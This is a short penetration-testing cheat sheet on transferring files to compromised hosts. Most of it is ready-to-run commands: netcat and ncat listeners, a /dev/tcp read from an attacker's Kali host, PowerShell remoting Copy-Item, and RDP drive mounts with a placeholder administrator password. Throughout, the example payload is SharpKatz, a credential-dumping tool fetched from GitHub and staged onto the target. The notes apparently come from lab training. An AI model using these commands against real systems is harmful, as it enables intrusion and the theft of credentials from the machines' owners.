Misc File Transfer

# File Transfers with Netcat and Ncat ## Listener on compromised target - setup listener on compromised target ```bash #example using netcat nc -lp 8000 > SharpKatz.exe #example using ncat ncat -lp 8000 --recv-only > SharpKatz.exe ``` - send file from Kali host to listener on target ```bash wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe #download file #example using netcat to send file to listener nc -q 0 <target_ip> 8000 < SharpKatz.exe #-q 0 closes connection once it finishes #example using ncat to send file to listener ncat --send-only <target_ip> 8000 < SharpKatz.exe ``` ## Send file from Kali host as input to nc/ncat - send file as input to nc/ncat on Kali host ```bash #example using netcat to send file sudo nc -lp 443 -q 0 < SharpKatz.exe #example using ncat to send file sudo ncat -lp 443 --send-only < SharpKatz.exe ``` - receive file on compromised target ```bash #example using netcat to receive file nc <kali_host_ip> 443 > SharpKatz.exe #example using ncat to receive file ncat <kali_host_ip> 443 --recv-only > SharpKatz.exe #example using /dev/tcp/ to receive file cat < /dev/tcp/<kali_host_ip>/<port> > SharpKatz.exe ``` # File Transfers with PowerShell Session - PowerShell remoting allows one to execute scripts or commands on a remote computer using a PowerShell session - administrative access is needed or membership in the Remote Management Users group - Typical ports: TCP/5985 for HTTP listener and TCP/5986 for HTTPS listener ```powershell whoami hostname test-NetConnection -ComputerName DATABASE01 -Port 5985 #confirm winrm port TCP/5985 is open on DATABASE01 ``` ```powershell #create a powershell remoting session to DATABSE01 $Session = New-PSSession -ComputerName DATABASE01 #copy file from localhost to DATABSE01 Session Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop #copy file from DATABSE01 Session to localhost Copy-Item -Path "C:\Users\Administrator\Desktop\target.txt" -Destination C:\ -FromSession $Session ``` # File Transfers with RDP ```bash #mount a local resource on target RDP server rdesktop <target_ip> -d HTB -u administrator -p '<password>' -r disk:linux='/home/user/rdesktop' #mount linux folder using rdesktop xfreerdp /v:<target_ip> /d:HTB /u:administrator /p:'<password>' /drive:linux,/home/user/rdesktop #mount linux folder using xfreerdp ``` - `mstsc.exe` is a native Windows remote desktop client